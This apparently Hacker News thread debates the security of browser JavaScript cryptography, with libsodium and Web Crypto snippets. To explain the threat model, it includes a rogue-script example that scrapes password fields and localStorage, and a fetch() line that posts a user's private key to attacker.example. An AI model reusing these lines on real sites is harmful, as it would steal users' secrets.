The author of that second one is a frequent HN commenter. Let me attempt to summon him to this thread to see if he has anything more to say, since that was written in 2011 and might be a bit out of date.
Begin summoning ritual...
• It's easy to secure email with GPG.
• DNSSEC is a state of the art design that you should adopt on your website as soon as possible, to make up for the deficiencies of TLS.
• You should use /dev/random for most cryptographic random number generation on Linux. /dev/urandom is only good for things where security doesn't matter.
Mostly. Just today I saw that the Arch Wiki is perpetuating the myth of /dev/urandom being insecure for crypto keys.
They even link to your and my writeup, but warn against mine, since it "contains fallacies".
The debate is never going to be decisively "won". Fortunately, enough holdouts have been convinced (Ruby, the kernel man-page writers) that the damage isn't as great anymore.
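For anyone landing here from the Arch Wiki: in practice you don't read either device file directly from application code anyway; you ask the platform CSPRNG, which is fed from the same kernel pool as /dev/urandom. A minimal sketch:

    // In the browser: the Web Crypto API's CSPRNG, backed by the OS
    // (on Linux, the same pool behind /dev/urandom)
    const key = crypto.getRandomValues(new Uint8Array(32));

    // In Node.js: same underlying source
    const { randomBytes } = require('crypto');
    const nodeKey = randomBytes(32);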
Something culinary is missing... you should pour those big-corporate MGP Whiskeys down the drain and get something from a small distillery. Or sous-vide is overrated, just a way to have plastic seep into your dinner.
Browser crypto has come a long way. With libraries like libsodium and proper implementation, I think it's drastically better than at the time of those articles (2013 and 2011).
Source: we also write encryption libraries and have a free implementation of our browser sdk at https://share.labs.tozny.com
No, it's not drastically better than it was in 2013.
People have done lots of things with browser cryptography, that's true. But none of what they've done addresses or mitigates the central flaw of browser javascript cryptography, which is that to use it, you have to continuously and durably trust the server. If you're doing that, you might as well just do the cryptography serverside.
The issue of having to trust the server also applies in a lot of non-browser cases. For example, I have to trust the 1Password update server, or forego 1Password updates.
It looks like the issues with browser-based cryptography from those two articles fall into three broad groups.
1. You have to trust the server.
2. The browsers don't do a good job of letting a site's JavaScript keep things secret from other things running in the browser.
3. If you implement cryptography in JavaScript, you are probably going to screw it up. There's a lot more to doing it right than just knowing to use AES and whatever the currently favored hash function is.
#1 is probably acceptable in a lot of cases, and #3 can probably be addressed by using the WebAssembly version of libsodium. That leaves #2 as the apparently insurmountable issue.
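To make #3 concrete, here's roughly what using the libsodium-wrappers package (the JS/WebAssembly build of libsodium) looks like, so you never hand-roll the AES-and-hash parts yourself. A minimal sketch, not production code:

    const sodium = require('libsodium-wrappers');

    async function demo() {
      await sodium.ready; // wait for the WebAssembly module to initialize

      const key = sodium.crypto_secretbox_keygen();
      const nonce = sodium.randombytes_buf(sodium.crypto_secretbox_NONCEBYTES);

      // authenticated encryption: tampering is detected on open
      const ciphertext = sodium.crypto_secretbox_easy('attack at dawn', nonce, key);
      const plaintext = sodium.to_string(
        sodium.crypto_secretbox_open_easy(ciphertext, nonce, key));
      console.log(plaintext); // "attack at dawn"
    }

    demo();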
Suppose the user were willing to create a separate Firefox or Chrome profile just for using my web-based app, didn't install any browser plug-ins under that profile, set its home page to my app page, and never used that profile to visit any other sites. Would that mitigate #2?
> The issue of having to trust the server also applies in a lot of non-browser cases. For example, I have to trust the 1Password update server, or forego 1Password updates.
These are not quite the same kinds of trust - nearly every request to a compromised web app server is an opportunity to inject malicious code and malicious UI and compromise the clientside part of the app.
Compromising a software update server doesn't necessarily get you any of that - for instance, your 1Password client will presumably verify the authenticity of the update before it applies it.
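A sketch of what that verification looks like, assuming the publisher's public key ships inside the installed client (the names here are mine, not 1Password's):

    const sodium = require('libsodium-wrappers');

    // publisherPublicKey ships inside the installed client, so a
    // compromised update server can't just substitute its own key.
    async function applyUpdate(updateBytes, signature, publisherPublicKey) {
      await sodium.ready;
      const ok = sodium.crypto_sign_verify_detached(
        signature, updateBytes, publisherPublicKey);
      if (!ok) throw new Error('update rejected: bad signature');
      // ...only install the update after this check passes
    }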
I don't think the private methods proposal will help with cryptography at all. The "security" it provides boils down to making it difficult for code outside the class to access the value, like you can already do with closures like this:
    function makeCounter() {
      var x = 0; // reachable only through the returned closure
      return function() { return ++x; };
    }
It doesn't help at all with side-channel attacks, which are the main reason why it's hard to safely perform cryptographic operations in a just-in-time-compiled language like JavaScript. It also doesn't stop rogue scripts on the same page from pulling the user's passwords/keys right out of the password field, URL bar, localStorage, or wherever else your script gets them from.
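That last point needs no sophistication at all. A hypothetical rogue script on the same page:

    // any other script running in the page (ad, analytics, compromised
    // dependency) can read secrets straight out of the DOM or storage:
    const pw  = document.querySelector('input[type="password"]')?.value;
    const key = localStorage.getItem('secretKey'); // hypothetical key name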
> the central flaw of browser javascript cryptography, which is that to use it, you have to continuously and durably trust the server
What do you think of doing JavaScript Crypto in a browser extension? An extension runs code in the browser without persistent trust of a server (at least in the traditional webapp way; you have to persistently trust the extension update server, extension authors, chrome update server, etc). You could do things like quickly, interactively encrypt chunks of text with a symmetric key. Presumably you'd use an extension UI to enter your keys, to avoid keylogging.
I think it would be illuminating to have a small suite of well-implemented cryptographic primitives, curated by a well-known expert, installed and ready to use on any string in the browser (a sketch of one such primitive follows below).
(BTW why don't we see more random chunks of cyphertext everywhere? It would seem to me a good channel, to use a combination of public forums to transfer short bursts of cyphertext. Where are the encrypted Twitter broadcasts??)
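As a sketch of what one primitive in such a suite might look like on top of the built-in Web Crypto API (AES-GCM is my choice here, purely for illustration):

    // module / async context assumed
    const key = await crypto.subtle.generateKey(
      { name: 'AES-GCM', length: 256 }, false, ['encrypt', 'decrypt']);

    async function encryptString(plaintext, key) {
      const iv = crypto.getRandomValues(new Uint8Array(12)); // fresh nonce per message
      const ciphertext = await crypto.subtle.encrypt(
        { name: 'AES-GCM', iv },
        key,
        new TextEncoder().encode(plaintext));
      return { iv, ciphertext: new Uint8Array(ciphertext) };
    }

    const box = await encryptString('hello, forum', key);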
The issue with browser extensions is that you are not far from the common hurdles of developing, releasing, and using a "real" desktop/mobile application. Having nothing to install and landing on a page that just works is a big plus for your users.
I wonder why browsers don't build their own browser API for file and mail crypto... that way you wouldn't have to trust the server, and you could verify that the server is using browser crypto.
There's no difference between trusting the server to deliver Javascript cryptography source code and trusting the server with your secrets. The server can just deliver code (in a number of different ways) to compromise those secrets.
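Concretely, the delivered "compromise" can be a single line slipped into any one of the responses the app loads (the attacker URL and key name are hypothetical):

    // a compromised (or compelled) server adds one line to the next page load:
    fetch('https://attacker.example/exfil', {
      method: 'POST',
      body: localStorage.getItem('userPrivateKey'), // or hook the key-entry UI
    });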
My understanding from the Apple/FBI fiasco is that it's an open question whether the US government is legally able to compel you to write and deliver custom code to your clients. But any local judge can issue you a warrant to hand over encrypted customer data that you're holding the key to.
But IANAL, maybe my take on that is overly simplistic.
Actually, Filekit is meant to be integrated into an application, and that application is responsible for delivering JS and handling identities, not the Tanker server.
Interestingly, the technology of Signed HTTP Exchanges could potentially be used as the basis for a system that removes the need to trust the server. The current Internet-Draft even includes a section on the Binary Transparency use case.
What's still missing, I think, is a way for a publisher to tell a browser "Only run new code from this domain after checking that the user is happy to upgrade". That would put the "web app" on roughly the same security footing as a desktop application with a built-in update system.
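There's no standard way to express that today; the closest sketch I can offer is a cache-first service worker, which pins the installed code until the worker itself is replaced (and that replacement is still server-controlled, so this only gestures at the idea):

    // sw.js - serve pinned, already-cached app code; never silently pick
    // up new code from the network for resources we already have
    self.addEventListener('fetch', (event) => {
      event.respondWith(
        caches.match(event.request)
              .then((cached) => cached || fetch(event.request)));
    });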
Wondering... browsers do seem to be able to do secure crypto in two existing scenarios: when presenting a client TLS certificate, and when performing authentication via WebAuthn in conjunction with U2F. Would it be possible to re-purpose either of those mechanisms for other potentially useful secure crypto (e.g. signing blockchain transactions)?
I don't see how you have to trust the server unless it's also serving the client bundle. There are many decentralized use cases where you might "bring your own client" (or maybe one trusted server gives it to you) and use the client to interact with other untrusted servers.
You can have a trusted client and an untrusted server.
This doesn't seem to do the downloading in a streaming manner, as indicated by its use of my old "file-saver"[1] library. Edit: I originally thought it also did the encryption without streaming.
Nowadays I would recommend using Penumbra[2] (another library I've worked on) with StreamSaver.js for streaming file encryption/decryption/downloading.
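The streaming pattern looks roughly like this; decryptTransform stands in for whatever TransformStream the crypto library exposes (I'm not reproducing Penumbra's actual API here):

    // assumes StreamSaver.js is loaded; run inside an async context
    const fileStream = streamSaver.createWriteStream('download.bin');
    const response = await fetch(encryptedFileUrl); // hypothetical source URL

    // network -> decrypt -> disk, chunk by chunk, never the whole file in memory
    await response.body
      .pipeThrough(decryptTransform) // a TransformStream wrapping the cipher
      .pipeTo(fileStream);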
I had to do a little digging into where it was pulling its crypto methods from, and it looks like they have a bit of their own library, but it uses libsodium via JavaScript wrappers underneath:
So, I guess take that as you will. I haven't read much of the actual source yet.
edit: I sort of expected there would be a move to the server, since it looks like they built their library to run on the server (even if it's running all of the libsodium methods in JavaScript), but it's definitely pulling the browser version and running it all in the client: https://github.com/TankerHQ/sdk-js/blob/master/packages/file...
JavaScript itself is quite safe, more so if it's running isolated like in a browser. Trusting your data to a piece of JavaScript code sent by a remote server, though, is only as safe as the server.
The "safety" being discussed here isn't system integrity, but rather cryptographic side channel safety, which is very much an open question in Javascript.
it's not so "isolated" - JavaScript running in a page can be examined and potentially altered through a number of vectors (probably the simplest is extensions).
AFAIK there's no way of running JS in a browser that is "safe" in the crypto sense.
Also https://www.nccgroup.trust/us/about-us/newsroom-and-events/b...